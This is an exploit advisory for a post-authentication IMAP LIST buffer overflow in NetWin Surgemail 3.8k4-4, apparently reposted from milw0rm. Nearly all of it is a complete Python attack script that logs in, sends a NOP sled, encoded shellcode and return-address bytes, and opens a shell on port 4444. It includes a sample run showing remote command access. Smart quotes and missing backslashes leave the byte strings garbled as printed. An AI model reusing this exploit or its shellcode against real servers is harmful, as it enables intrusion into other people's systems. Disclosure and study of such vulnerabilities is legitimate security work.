‘NetWin Surgemail LIST Universal (Exploit)’

Summary

A vulnerability in NetWin’s IMAP server allows authenticated users to cause an internal buffer to overflow which in turn can be used to cause the product to execute arbitrary code.’

Credit:

‘The information has been provided by Matteo Memelli aka ryujin.
The original article can be found at: http://www.milw0rm.com/exploits/5259


Details

Vulnerable Systems:
 * NetWin version 3.8k4-4

Exploit:
#!/usr/bin/python
#######################################
#
# NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Universal Exploit
# Discovered and coded by Matteo Memelli aka ryujin
# http://www.gray-world.net http://www.be4mind.com
#
# Affected Versions : Version 3.8k4-4 Windows Platform
# Tested on OS : Windows 2000 SP4 English
# Windows XP Sp2 English
# Windows 2003 Standard Edition Italian
# Discovery Date : 03/13/2008
#
#———————————————
#
# Thx to muts _[at]_ offensive-security.com
# for the ‘Partial Overwrite’ Suggestion 🙂 Now I know it works!
#
#———————————————
########################################
#
# matte@badrobot:~/surgemail$ ./surgemail_list.py -H 192.168.1.245 -P 143 -l
# test -p test
#
# [*********************************************************************]
# [* *]
# [* NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit *]
# [* Discovered and Coded By *]
# [* Matteo Memelli *]
# [* (ryujin) *]
# [* www.be4mind.com – www.gray-world.net *]
# [* *]
# [*********************************************************************]
# [+] Connecting to imap server…
# * OK IMAP ryujin (Version 3.8k4-4)
#
# [+] Logging in…
# 0001 OK LOGIN completed
#
# [+] PWNING IN PROGRESS 🙂 …
# [+] DONE! Check your shell on 192.168.1.245:4444
# matte@badrobot:~/surgemail$ nc 192.168.1.245 4444
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# c:surgemail>ipconfig
# ipconfig
#
# Windows IP Configuration
#
#
# Ethernet adapter Local Area Connection:
#
# Connection-specific DNS Suffix . :
# IP Address. . . . . . . . . . . . : 192.168.1.245
# Subnet Mask . . . . . . . . . . . : 255.255.255.0
# Default Gateway . . . . . . . . . : 192.168.1.197
#
# c:surgemail>
#
########################################

from socket import *
from optparse import OptionParser
import sys, time

print ‘[*********************************************************************]’
print ‘[* *]’
print ‘[* NetWin Surgemail 0DAY (IMAP POST AUTH) Remote LIST Exploit *]’
print ‘[* Discovered and Coded By *]’
print ‘[* Matteo Memelli *]’
print ‘[* (ryujin) *]’
print ‘[* www.be4mind.com – www.gray-world.net *]’
print ‘[* *]’
print ‘[*********************************************************************]’
usage = ‘%prog -H TARGET_HOST -P TARGET_PORT -l USER -p PASSWD’
parser = OptionParser(usage=usage)
parser.add_option(‘-H’, ‘–target_host’, type=’string’,
                  action=’store’, dest=’HOST’,
                  help=’Target Host’)
parser.add_option(‘-P’, ‘–target_port’, type=’int’,
                  action=’store’, dest=’PORT’,
                  help=’Target Port’)
parser.add_option(‘-l’, ‘–login-user’, type=’string’,
                  action=’store’, dest=’USER’,
                  help=’User login’)
parser.add_option(‘-p’, ‘–login-password’, type=’string’,
                  action=’store’, dest=’PASSWD’,
                  help=’User password’)
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
USER = options.USER
PASSWD = options.PASSWD
if not (HOST and PORT and USER and PASSWD):
   parser.print_help()
   sys.exit()

NOPES = ‘x90’*9654
SJUMP = ‘xEBxF9x90x90’ # Jmp Back
NJUMP = ‘xE9xDDxD7xFFxFF’ # And Back Again Baby 😉
# Partial Overwrite: 0x00 not allowed in buffer and all poppopret
# begin with 0x00 in surgemail.exe
RET = ‘x7ex51x78’
SHELLCODE = (
#[*] x86/alpha_mixed succeeded, final size 697
‘x89xe0xd9xebxd9x70xf4x59x49x49x49x49x49x49x49’
‘x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41’
‘x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42’
‘x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b’
‘x4cx43x5ax4ax4bx50x4dx4dx38x4bx49x4bx4fx4bx4f’
‘x4bx4fx43x50x4cx4bx42x4cx47x54x46x44x4cx4bx50’
‘x45x47x4cx4cx4bx43x4cx44x45x44x38x45x51x4ax4f’
‘x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x43x31x4a’
‘x4bx50x49x4cx4bx46x54x4cx4bx45x51x4ax4ex50x31’
‘x49x50x4cx59x4ex4cx4bx34x49x50x42x54x44x47x49’
‘x51x48x4ax44x4dx43x31x49x52x4ax4bx4bx44x47x4b’
‘x50x54x51x34x47x58x44x35x4ax45x4cx4bx51x4fx46’
‘x44x45x51x4ax4bx45x36x4cx4bx44x4cx50x4bx4cx4b’
‘x51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4bx4b’
‘x39x42x4cx51x34x45x4cx43x51x48x43x46x51x49x4b’
‘x43x54x4cx4bx51x53x50x30x4cx4bx51x50x44x4cx4c’
‘x4bx44x30x45x4cx4ex4dx4cx4bx51x50x45x58x51x4e’
‘x43x58x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx4e’
‘x36x42x46x46x33x43x56x42x48x47x43x46x52x45x38’
‘x44x37x44x33x46x52x51x4fx46x34x4bx4fx4ex30x45’
‘x38x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48x56’
‘x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx45x58x45’
‘x52x46x35x43x5ax44x42x4bx4fx4ex30x45x38x48x59’
‘x45x59x4ax55x4ex4dx46x37x4bx4fx49x46x51x43x46’
‘x33x50x53x51x43x51x43x50x43x50x53x47x33x46x33’
‘x4bx4fx48x50x45x36x45x38x42x31x51x4cx43x56x51’
‘x43x4dx59x4dx31x4ax35x45x38x4ex44x45x4ax42x50’
‘x48x47x46x37x4bx4fx49x46x43x5ax42x30x46x31x46’
‘x35x4bx4fx4ex30x43x58x49x34x4ex4dx46x4ex4bx59’
‘x46x37x4bx4fx48x56x50x53x51x45x4bx4fx4ex30x43’
‘x58x4bx55x50x49x4bx36x47x39x51x47x4bx4fx48x56’
‘x46x30x50x54x46x34x46x35x4bx4fx4ex30x4dx43x45’
‘x38x4ax47x42x59x48x46x44x39x50x57x4bx4fx4ex36’
‘x50x55x4bx4fx4ex30x43x56x42x4ax42x44x45x36x45’
‘x38x45x33x42x4dx4bx39x4dx35x43x5ax50x50x46x39’
‘x51x39x48x4cx4cx49x4dx37x42x4ax51x54x4bx39x4d’
‘x32x50x31x49x50x4ax53x4ex4ax4bx4ex47x32x46x4d’
‘x4bx4ex47x32x46x4cx4dx43x4cx4dx43x4ax46x58x4e’
‘x4bx4ex4bx4ex4bx45x38x42x52x4bx4ex48x33x42x36’
‘x4bx4fx43x45x47x34x4bx4fx48x56x51x4bx50x57x51’
‘x42x50x51x46x31x46x31x42x4ax43x31x46x31x50x51’
‘x51x45x46x31x4bx4fx48x50x43x58x4ex4dx4ex39x43’
‘x35x48x4ex50x53x4bx4fx4ex36x42x4ax4bx4fx4bx4f’
‘x50x37x4bx4fx4ex30x4cx4bx51x47x4bx4cx4cx43x49’
‘x54x45x34x4bx4fx49x46x51x42x4bx4fx48x50x45x38’
‘x4ax4fx48x4ex4dx30x45x30x51x43x4bx4fx49x46x4b’
‘x4fx4ex30x44x4ax41x41’)

s = socket(AF_INET, SOCK_STREAM)
print ‘ [+] Connecting to imap server…’
s.connect((HOST, PORT))
print s.recv(1024)
print ‘ [+] Logging in…’
s.send(‘0001 LOGIN %s %srn’ % (USER, PASSWD))
print s.recv(1024)
print ‘ [+] PWNING IN PROGRESS 🙂 …’
EVIL = NOPES + SHELLCODE + NJUMP + SJUMP + RET
s.send(‘0002 LIST () ‘/’ + EVIL + ” ‘PWNED’rn’)
print ‘ [+] DONE! Check your shell on %s:%d’ % (HOST, 4444)
s.close()

# milw0rm.com [2008-03-14]’

Categories: Exploits